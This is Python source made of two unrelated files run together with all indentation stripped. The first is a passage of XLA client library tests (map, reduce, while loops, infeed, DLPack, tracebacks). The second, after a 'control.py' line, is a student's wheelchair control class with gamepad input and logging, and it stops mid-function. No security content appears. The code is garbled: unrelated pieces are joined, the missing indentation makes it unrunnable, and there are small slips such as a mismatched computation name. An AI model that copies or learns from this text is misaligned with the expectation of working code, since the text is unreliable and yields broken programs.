def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_lt_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testCall(self, dtype):
c = self._NewComputation()
ops.Call(
c,
self._CreateMulBy2Computation(dtype),
operands=(ops.Constant(c, dtype(5.0)),))
self._ExecuteAndCompareClose(c, expected=[10.0])
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
"in_dtype": in_dtype,
"out_dtype": out_dtype,
} for in_dtype, out_dtype in [[np.float32, np.int32]])
def testMapEachElementToConstant(self, in_dtype, out_dtype):
c = self._NewComputation()
ops.Map(c,
[ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
self._CreateConstantComputation(in_dtype, out_dtype), [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testMapMulBy2(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSimpleMapChain(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
# Chains a map of constant-out with a map of mul-by-2
c = self._NewComputation()
const = ops.Map(
c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateConstantComputation(dtype, dtype), [0])
ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
# TODO(b/154752816): bfloat16 crashes in evaluator.
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDivVectorsWithMap(self, dtype):
def DivComputation():
c = self._NewComputation("div_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
c = self._NewComputation()
ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
DivComputation(), [0])
self._ExecuteAndCompareClose(
c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSelectAndScatter(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
operand = ops.Constant(
c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID,
c.get_shape(operand).dimensions(), window_dimensions, window_strides)
ops.SelectAndScatterWithGeneralPadding(
operand,
select=self._CreateBinaryGeComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
init_value=ops.Constant(c, np.array(1, dtype=dtype)),
scatter=self._CreateBinaryAddComputation(dtype))
self._ExecuteAndCompareClose(
c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
c = self._NewComputation()
ops.Reduce(
c,
operands=[
ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[0])
self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
"dtype": dtype,
"dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[dim])
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
"testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
"dtype": dtype,
"dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
input_array = self._MakeSample3DArray(dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=dims)
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
def LessThan10Cond():
c = self._NewComputation("test_lt_10")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
return c.build()
cond = LessThan10Cond()
body = self._CreateMulBy2Computation(dtype)
c = self._NewComputation()
init = ops.Constant(c, dtype(1.))
ops.While(cond, body, init)
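      # Starting from 1, the body doubles the value each iteration (1, 2, 4, 8, 16);
      # the loop exits once the value is no longer < 10, leaving 16.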
self._ExecuteAndCompareClose(c, expected=[16.])
def testConditionalTrue(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(True))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(False))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[1.])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for item in to_infeed:
device.transfer_to_infeed(item)
for item in to_infeed:
result, = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
device.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent())
x = ops.GetTupleElement(x_and_token, 0)
token = ops.GetTupleElement(x_and_token, 1)
outfeed_shape = xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent()
ops.OutfeedWithToken(x, token, outfeed_shape)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.execute([]))
execution.start()
device.transfer_to_infeed(want)
got = device.transfer_from_outfeed(outfeed_shape)
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
ops.Scatter(
ops.Constant(c, a), ops.Constant(c, scatter_indices),
ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=[expected])
class DeviceTest(ComputationTest):
def testPlatform(self):
for device in self.backend.local_devices():
self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
def setUp(self):
super(ErrorTest, self).setUp()
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return self.backend.compile(c.build(), compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
def TestFun():
return xla_client.execute_with_python_values(
self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = sharding.type.REPLICATED
sharding.tile_assignment_dimensions.extend([1])
sharding.tile_assignment_devices.extend([0])
c.set_sharding(sharding)
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
c.clear_sharding()
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
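  # Builds the test-case name suffix, e.g. FormatShapeAndDtype((2, 3), np.float32)
  # returns "_float32[2,3]".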
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
def setUp(self):
super(DLPackTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform not in ("cpu", "gpu"):
self.skipTest("DLPack requires CPU or GPU")
# pylint: disable=g-complex-comprehension
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "{}_own={}".format(FormatShapeAndDtype(shape, dtype),
take_ownership),
"dtype": dtype,
"shape": shape,
"take_ownership": take_ownership
} for dtype in dlpack_dtypes for shape in testcase_shapes
for take_ownership in [False, True])
# pyformat: enable
def testRoundTrip(self, dtype, shape, take_ownership):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=take_ownership)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
np.testing.assert_array_equal(x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def ConsumeDLPackTensor():
_ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
ConsumeDLPackTensor()
self.assertRaisesRegex(
RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
def testTensorsCanBeOwnedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
self.assertTrue(buffer.is_deleted())
with self.assertRaisesRegex(
RuntimeError,
"Cannot convert deleted/invalid buffer to DLPack tensor.*"):
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def testNonOwnedDlpackCanBeViewedTwice(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
del d1, d2
np.testing.assert_array_equal(x, buffer.to_py())
np.testing.assert_array_equal(x, y.to_py())
np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
def setUp(self):
super(BufferProtocolTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform != "cpu":
self.skipTest("Test requires CPU")
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes if dtype != bfloat16
for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
buffer = self.backend.buffer_from_pyval(
x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should
# alias.
self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
buffer2 = self.backend.buffer_from_pyval(
x, host_buffer_semantics=during_call)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
buffer = self.backend.buffer_from_pyval(x)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
def setUp(self):
super(TracebackTest, self).setUp()
self.backend = xla_backend()
def testNoTracebacksIfDisabled(self):
with xla_client.tracebacks(enabled=False):
self.assertEqual(None, xla_client.Traceback.get_traceback())
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertEqual(None, buffer.traceback)
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertEqual(None, e.traceback)
def assertIsTracebackContaining(self, tb, function):
self.assertIsInstance(tb, xla_client.Traceback)
self.assertIn(function, str(tb))
self.assertTrue(any(f.function_name == function for f in tb.frames))
def testTracebacks(self):
with xla_client.tracebacks(enabled=True):
tb = xla_client.Traceback.get_traceback()
self.assertIsTracebackContaining(tb, "testTracebacks")
# Tracebacks are not implemented on the TPU driver extension's variant
# of buffers and executables.
if not isinstance(self.backend, xla_client.Client):
return
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertIsTracebackContaining(e.traceback, "testTracebacks")
def testNestedFunction(self):
def AFunction():
def AnotherFunction():
return xla_client.Traceback.get_traceback()
return AnotherFunction()
with xla_client.tracebacks(enabled=True):
tb = AFunction()
self.assertIsInstance(tb, xla_client.Traceback)
frames = tb.frames
i = next(
i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
tests.append(TracebackTest)
return tests
def InstantiateTests(globals_dict, backend_fn, test_prefix="", **kw):
# Avoid creating a new backend per test (this causes GPU OOM, and is probably
# inefficient).
backend_fn = functools.lru_cache(maxsize=None)(backend_fn)
for klass in TestFactory(backend_fn, **kw):
test = type(test_prefix + klass.__name__, (klass,), {})
# Clean up the qualified names of the tests to not include the test factory.
test.__qualname__ = test.__name__
globals_dict[test.__name__] = test
if __name__ == "__main__":
flags.DEFINE_string("backend", "cpu", "Target backend.")
InstantiateTests(globals(),
lambda: xla_client.get_local_backend(FLAGS.backend))
absltest.main()
|
control.py
|
#NAME: move.py
#DATE: 08/02/2019
#AUTH: Ryan McCartney, EEE Undergraduate, Queen's University Belfast
#DESC: A python class for moving the wheelchair in an intuitive manner
#COPY: Copyright 2019, All Rights Reserved, Ryan McCartney
import numpy as np
import threading
import time
import math
import requests
import pygame
from requests import Session
#define threading wrapper
def threaded(fn):
def wrapper(*args, **kwargs):
thread = threading.Thread(target=fn, args=args, kwargs=kwargs)
thread.start()
return thread
return wrapper
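#Usage note (sketch): any method decorated with @threaded starts running on a new
#thread as soon as it is called and returns the Thread object, so the caller can
#keep the handle and join() it when it needs to wait for completion.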
class Control:
#Received Variables
batteryVoltage = 0
rightMotorCurrent = 0
leftMotorCurrent = 0
status = "NULL"
#Intrinsic Parameters
setSpeed = 0
setAngle = 0
setCommand = "SEND"
bootTime = 8
debug = False
def __init__(self,configuration):
self.connected = False
#Load Configuration Variables
try:
self.host = configuration['control']['url']
self.maxSpeed = configuration['control']['maxSpeed']
#Get the details of the log file from the configuration
logFilePath = configuration['general']['logFileDirectory']
logFileName = "gamepadNavigation.txt"
self.logFileFullPath = logFilePath + logFileName
self.logging = True
#Open log file
try:
self.log("INFO = Control class has accessed log file.")
except:
self.logging = False
self.log("ERROR: Unable to access log file when initialising control interface.")
except:
self.log("ERROR = The configuration file cannot be decoded.")
self.gamepadRunning = False
self.gamepad()
#Open Transmission and Receive Log Files
try:
#Create a file for both transmission and receive logs depending on time
currentDateTime = time.strftime("%d-%m-%Y")
#Initialise Transmit Log
self.transmitLogFilePath = "data\control\Transmitted Data -" + currentDateTime + ".csv"
transmitLog = open(self.transmitLogFilePath,"w")
transmitLog.write("Date and Time,Speed,Angle,Command Message\n")
transmitLog.close()
#Initialise Receive Log
self.receiveLogFilePath = "data\control\Received Data - " + currentDateTime + ".csv"
receiveLog = open(self.receiveLogFilePath,"w")
receiveLog.write("Date & Time,Battery Voltage(V),Right Current (A),Left Current (A),Status Message\n")
receiveLog.close()
#Log Entry
self.log("INFO = Opened Log files for transmission and receive data.")
except:
self.log("ERROR = Could not open transmit and receive logs.")
#Send Message and Retrieve Response
self.reset()
self.log("INFO = Control interface initialised succesfully.")
#Logging Function
def log(self, entry):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
logEntry = currentDateTime + ": " + entry
if self.logging == True:
#open a txt file to use for logging
logFile = open(self.logFileFullPath,"a+")
logFile.write(logEntry+"\n")
logFile.close()
print(logEntry)
#Receive Log Function
def receiveLog(self, entry):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
logEntry = currentDateTime + "," + entry
if self.logging == True:
#open a txt file to use for logging
logFile = open(self.receiveLogFilePath,"a+")
logFile.write(logEntry+"\n")
logFile.close()
#Transmit Log Function
def transmitLog(self, entry):
currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S")
logEntry = currentDateTime + ": " + entry
if self.logging == True:
#open a txt file to use for logging
logFile = open(self.transmitLogFilePath,"a+")
logFile.write(logEntry+"\n")
logFile.close()
#Send and Receive Messages with implemented logging
@threaded
def gamepad(self):
topSpeed = 30
try:
pygame.init()
pygame.joystick.init()
#Check number of gamepads
gamepads = pygame.joystick.get_count()
#Log Entry
self.log("INFO = "+str(gamepads)+" gamepads avalible.")
if gamepads > 0:
#Initialise first gamepad
j = pygame.joystick.Joystick(0)
j.init()
                #Check available axes
axis = j.get_numaxes()
#Log Entry
self.log("INFO = Gamepad with "+str(axis)+" axis has been initiated.")
while 1:
while self.gamepadRunning:
#Get Current Data
pygame.event.get()
xAxisLeft = j.get_axis(0)
yAxisLeft = j.get_axis(1)
aButton = j.get_button(0)
bButton = j.get_button(1)
yButton = j.get_button(2)
xButton = j.get_button(3)
#print("Raw data =",xAxisLeft,",",yAxisLeft)
#Mapped Data for API
speed = int(-yAxisLeft*topSpeed)
angle = int(-xAxisLeft*100)
#On button presses start and stop wheelchair
if aButton == True:
self.reset()
if bButton == True:
self.eStop()
if xButton == True:
topSpeed = topSpeed + 1
if topSpeed > 100:
topSpeed = 100
self.log("INFO = Top Speed is now "+str(topSpeed))
if yButton == True:
topSpeed = topSpeed - 1
if topSpeed < 0:
topSpeed = 0
self.log("INFO = Top Speed is now "+str(topSpeed))
#If new command has been identified then send new data to API
if (self.setSpeed != speed) or (self.setAngle != angle):
self.transmitCommand(speed,angle,"RUN")
#print("Mapped speed is",speed,"and the angle is",angle)
except:
#Log Entry
self.log("STATUS = No Gamepads are avalible. Have you connected any?")
    #Converts speed in m/s to arbitrary units for commands
def getSpeedValue(self,speed):
        #Linear Relationship parameters for conversion
m = 0.0319
c = -0.1
speedArbitary = int((speed - c)/m)
return speedArbitary
    #Converts speed in arbitrary units to metric (m/s)
def getSpeedMetric(self,speed):
        #Linear Relationship parameters for conversion
m = 0.0319
c = -0.1
speedMetric = (m*speed)+c
speedMetric = round(speedMetric,2)
return speedMetric
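    #Worked example: 0.9 m/s maps to int((0.9 + 0.1)/0.0319) = 31 arbitrary units,
    #and 31 units map back to round(0.0319*31 - 0.1, 2) = 0.89 m/s.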
#returns the distance travelled based on the speed
@staticmethod
def distanceTravelled(speed, time):
distance = speed*time
return distance
#parse response
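    #The wheelchair API is expected to reply with a comma separated string such as
    #"24.6,1.2,1.1,OK" (illustrative values): battery voltage, right motor current,
    #left motor current and a status message.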
def decodeResponse(self, receivedMessage):
if receivedMessage != "":
data = receivedMessage.split(",")
if len(data) >= 4:
                self.batteryVoltage = float(data[0])
                self.rightMotorCurrent = float(data[1])
                self.leftMotorCurrent = float(data[2])
self.status = data[3]
#Determine Power Consumption (in Watts)
def powerConsumed(self):
self.transmitCommand(self.setSpeed,self.setAngle,"SEND")
#Accounting for Baseload Current Consumption (A)
current = 1.25
#Calculation Carried out using simple P=VI Equation
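        #Worked example (hypothetical readings): a 24.0V battery with 1.0A and 0.8A
        #motor currents gives (1.25 + 1.0 + 0.8)A * 24.0V = 73.2W.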
current = current + self.rightMotorCurrent + self.leftMotorCurrent
power = self.batteryVoltage*current
return power
#Speed Ramping Function
def rampSpeed(self,newSpeed,acceleration):
#Update Variables Before Starting
self.getUpdate()
delay = 1/acceleration
delay = int(delay)
command = "RUN"
#Direction Forward
if newSpeed >= 0:
#Accelerate
if newSpeed > self.setSpeed:
while (newSpeed != self.setSpeed) and (self.connected == True):
speed = self.setSpeed + 1
self.transmitCommand(speed,self.setAngle,command)
